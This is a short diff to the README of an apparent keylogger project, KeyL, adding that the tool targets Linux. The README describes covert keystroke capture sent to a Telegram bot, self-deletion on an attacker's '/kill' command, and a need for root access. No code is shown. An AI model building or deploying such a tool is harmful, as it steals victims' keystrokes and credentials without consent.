fortigate3600/KeyL/README.md

 # KeyL

-This program records keystrokes and sends them to a telegram bot, until the attacker send the `/kill` command so the program delete itself from the target's machine.
+This program records keystrokes on Linux machine and sends them to a telegram bot, until the attacker send the `/kill` command so the program delete itself from the target's machine.

 It require root access to the target.